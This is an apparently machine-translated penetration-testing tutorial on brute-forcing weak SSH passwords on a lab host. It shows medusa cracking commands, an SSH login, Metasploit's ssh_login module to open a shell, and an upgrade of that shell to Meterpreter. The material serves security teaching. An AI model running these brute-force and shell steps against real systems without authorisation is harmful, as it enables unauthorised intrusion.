6-5 vulnerability exploitation SSH weak password cracking and utilization

After cracking the password , Get the corresponding user name , You can use ssh Client software , Log in accordingly , After login , We can do many operations , get shell, stay shell among , You can execute the corresponding command

Medusa ssh Weak password cracking

If you are setting SSH The service , The administrator set the user name and password that can be easily guessed out for the convenience of memory （ Weak password ）. Then the tester can use the corresponding password tools to authenticate and brutally crack weak passwords , Or the process of cracking the user name and password at the same time . So as to get some user names and passwords that are easy to guess , After cracking it, you can log in to the system with the corresponding user name and password ssh

Weak password cracking , Verified a saying , Flies don't bite seamless eggs , Because we set a weak password , It is likely to be cracked , For our convenience , This leads to the defects of the system , It's very inappropriate

Let's introduce medusa For the specified ssh Service to crack user name and password

medusa -h 192.168.1.100 -u msfadmin -p msfadmin -M ssh

adopt -M Specify the service to crack , appear success Indicates successful cracking , without , It means that our dictionary does not contain a user name and password combination of our login system

First of all, we ping Check the target server

ping 192.168.1.100

medusa
// View help information 

medusa -d

adopt -d Here's a list of , Modules or protocols we know , When we crack , We want to get rid of .mod, direct ssh Can

medusa -h 192.168.1.100 -u msfadmin -P /root/Desktop/pass.txt -M ssh

This is the time , Try our password every time , Whether it matches the corresponding user name

SSH Command line tool login

use ssh Client login ssh service , To operate , When there is no graphical interface , We completely need to rely on the command line , Or is it linux Built-in tools , To operate , Complete the operation more efficiently

In general Linux All have ssh client , Used to log in ssh Server side

have access to ssh user name @IP Address Then enter the password according to the prompt

By default 22 Port no. , We don't need to specify the corresponding port , Of course , If our ssh Ports are other ports , We just need -p Specify the corresponding port number

ssh [email protected]
msfadmin
id
ifconfig

After login , You can execute some commands , He just used ssh Service login

Metasploit utilize SSH Login bounce shell

Use Metasploit Can be done ssh Sign in （ According to the result of cracking , Automatic login ）, The corresponding Bash shell Connect .

medusa Only crack , And ours metasploit The corresponding result will be returned , So that we can execute orders , He combined medusa and ssh Such an operation of the client

set rhosts 192.168.1.100
set username msfadmin
set password msfadmin
run
sessions -l

msfconsole
//metasploit Command line controlled terminal 
use auxiliary/scanner/ssh/ssh_login
show options
set rhosts 192.168.1.100

set username msfadmin
show options

set password msfadmin
show options

run

sessions -l
sessions -i 1
id

ifconfig

Metasploit obtain Meterperter shell

Using the obtained Bash shell, Inject Metasploit in Meterpreter payload So as to obtain more powerful shell.

sessions -u 1
// Enter the id, Will inject the corresponding meterpreter payload
sessions -l
// Use session -l To view the 
sessions -i 3
// Enter the corresponding payload id Connect 
id
pwd